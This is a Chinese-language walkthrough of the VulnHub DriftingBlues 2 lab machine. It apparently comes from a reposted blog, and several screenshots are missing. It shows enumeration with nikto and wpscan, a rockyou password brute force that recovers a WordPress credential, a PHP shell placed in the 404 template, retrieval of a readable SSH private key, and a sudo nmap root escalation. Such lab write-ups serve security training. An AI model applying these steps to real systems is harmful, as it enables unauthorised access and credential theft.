?vbox匯入,網路橋接,
靶機下載地址:https://download.vulnhub.com/driftingblues/driftingblues2.ova
一:資訊收集
1;主機發現,

2;開放服務埠,ftp匿名登錄,



3;ftp匿名登錄的一張圖片,

4;把圖片復制到kali里面,利用工具steghide 查看一下圖片里的資訊,需要密碼,emmmm,什么都沒有,

5;沒發現其他,我們目錄遍歷一下,

![]()
nikto -h http://192.168.1.23 新掃描目標站點下有無目錄的工具

![]()
6;一個登錄框,添加本地host,因為/blog原始碼里面有個域名,
192.168.1.23 driftingblues.box

?
6;一個登錄框,添加本地host,因為/blog原始碼里面有個域名,by albert?可能是用戶名,
192.168.1.23 driftingblues.box,在hosts添加,


那就用wp-scan工具掃描一下有沒有用戶名或者可利用的插件,確定是albert是用戶名,
wpscan --url http://192.168.1.23/blog/ -e u

![]()
7;爆破一下這個用戶的密碼,albert/scotland1
wpscan --url http://192.168.1.23/blog/ --passwords /usr/share/wordlists/rockyou.txt --usernames albert
?
8;登錄成功,
二;漏洞利用
1;往404頁面寫個PHPshell進去,保存,凱莉開啟監聽,訪問一個不存在的路徑,

2;監聽成功,升級一下shell,

3;在home目錄下發現一個freddie用戶,還發現了.ssh的檔案,進入 .ssh 檔案夾,發現存在公私鑰資訊檔案,且私鑰檔案可讀可執行,
?
可以直接復制粘貼到檔案上去,

![]()
也可以開服務,卡莉下載私鑰檔案,
python2 -m SimpleHTTPServer 9998
wget http://192.168.1.23:9998/id_rsa

4;利用私鑰檔案,登錄freddie用戶,

?
5;看到有root權限,nmap提權,提權成功,兩個flag,
https://gtfobins.github.io/查找nmap
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF


![]()
?使用 python 切換 bash:python3 -c 'import pty; pty.spawn("/bin/bash")'

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/539243.html
標籤:其他
